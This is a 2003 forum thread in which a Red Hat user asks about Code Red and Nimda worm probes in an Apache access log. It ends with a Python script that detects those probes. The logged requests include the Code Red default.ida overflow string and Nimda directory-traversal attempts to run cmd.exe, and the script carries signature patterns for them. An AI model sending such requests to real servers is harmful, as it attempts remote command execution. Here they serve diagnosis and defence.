CINIK WORM and strange lines in web server's access_log


ilin
07-13-2003, 05:55 AM
Hi,

Some 5-6 months ago my PC with RedHat 7.1 was infected with the CINIK WORM. Then I disinfected it as described on an antivirus website. But since then, every day, I have these strange lines in my Apache access log:


62.251.228.130 - - [13/Jul/2003:12:43:33 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 209


62.163.178.22 - - [17/Jan/2003:18:10:43 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214
62.163.178.22 - - [17/Jan/2003:18:10:43 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 212
62.163.178.22 - - [17/Jan/2003:18:10:44 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222
62.163.178.22 - - [17/Jan/2003:18:10:45 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222
62.163.178.22 - - [17/Jan/2003:18:10:49 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236
62.163.178.22 - - [17/Jan/2003:18:10:50 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253
62.163.178.22 - - [17/Jan/2003:18:10:51 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253
62.163.178.22 - - [17/Jan/2003:18:10:52 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 269
62.163.178.22 - - [17/Jan/2003:18:10:52 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235


I can't understand whether my PC is still infected with the CINIK WORM (or any other)? Or does something else on my PC provoke those strange requests? And generally :) why are those lines in my access_log, what do they mean, and can I do something to stop those requests?

Thanks in advance!!!

redhat81
07-13-2003, 06:00 AM
I host only one website on my server and nobody in the world has the domain name to it, yet I get the same items in my log.

They're random attacks from a Code Red infected Windows Machine. It's looking for an IIS exploit that uses default.ida.

You're running Linux, all they get is a 404 error.

You can't make it stop, though, which means they'll clog up the bandwidth needed to send out that 404 page.

ilin
07-13-2003, 06:09 AM
I think the same.

Thank you! :)

phlipant
07-13-2003, 06:32 AM
I've been getting both for years. One is Code Red, the other is Nimda.

It's just a bunch of annoying Microsoft people. Ignore them.
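A way to triage log lines like these, added here as an example that is not code from this thread or from any of its posters: it parses Apache common-log entries, tags requests that match the Code Red (/default.ida) and Nimda (root.exe, cmd.exe, %255c and %c1%1c traversal) patterns that redhat81 and phlipant identify, counts probes per family and per source host, and flags any probe that did not get a 404 (on an Apache box these paths should not exist; the default.ida hit in the first post returned 200, which is worth a look at what actually answered it). The function names, the signature table and the sample log lines (TEST-NET addresses, shortened Code Red payload) are constructed for this example.

```python
import re
from collections import Counter

# Apache common log format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Request-path signatures for the two worms named in the thread (assumed table).
SIGNATURES = {
    # Code Red: probes the IIS .ida ISAPI filter through /default.ida?...
    "code_red": [re.compile(r"^/default\.ida\?", re.I)],
    # Nimda: looks for root.exe / cmd.exe via traversal with double-encoded
    # (%255c) or malformed-UTF-8 (%c1%1c) path separators
    "nimda": [
        re.compile(r"/root\.exe", re.I),
        re.compile(r"/cmd\.exe", re.I),
        re.compile(r"%255c|%c1%1c", re.I),
    ],
}


def parse_line(line):
    """Parse one common-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(path):
    """Return the worm family whose signature matches the request path, else None."""
    for name, patterns in SIGNATURES.items():
        if any(p.search(path) for p in patterns):
            return name
    return None


def summarize(lines):
    """Count worm probes per family and per source host.

    Also collects probes that did not receive a 404, since on a Linux/Apache
    host these paths should not exist and any other status deserves a check.
    """
    by_worm = Counter()
    by_host = Counter()
    not_404 = []
    unparsed = 0
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            unparsed += 1
            continue
        worm = classify(rec["path"])
        if worm is None:
            continue  # ordinary request, not a worm probe
        by_worm[worm] += 1
        by_host[(worm, rec["host"])] += 1
        if rec["status"] != 404:
            not_404.append((worm, rec["host"], rec["status"], rec["path"]))
    return {"by_worm": by_worm, "by_host": by_host,
            "not_404": not_404, "unparsed": unparsed}


# Constructed sample log (TEST-NET addresses, not the thread's real hosts).
# The Code Red payload is shortened; only the /default.ida? prefix matters here.
SAMPLE_LOG = """\
192.0.2.10 - - [13/Jul/2003:12:43:33 +0300] "GET /default.ida?XXXXXXXX%u9090%u6858=a HTTP/1.0" 200 209
192.0.2.20 - - [17/Jan/2003:18:10:43 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214
192.0.2.20 - - [17/Jan/2003:18:10:44 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222
192.0.2.20 - - [17/Jan/2003:18:10:49 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236
192.0.2.20 - - [17/Jan/2003:18:10:52 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235
192.0.2.30 - - [17/Jan/2003:18:11:00 +0300] "GET /index.html HTTP/1.0" 200 1043
this line is not a log entry
"""

if __name__ == "__main__":
    report = summarize(SAMPLE_LOG.splitlines())
    for worm, n in sorted(report["by_worm"].items()):
        print(f"{worm}: {n} probe(s)")
    for (worm, host), n in sorted(report["by_host"].items()):
        print(f"  {worm} from {host}: {n}")
    for worm, host, status, path in report["not_404"]:
        print(f"non-404 probe: {worm} from {host} got {status} for {path}")
    print(f"unparsed lines: {report['unparsed']}")
```

Run against a real access_log with `summarize(open("/var/log/httpd/access_log"))`; the per-host counts show whether the noise comes from a few infected neighbours or from many sources, and an empty `not_404` list confirms the server is handing the worms nothing but error pages, as redhat81 describes.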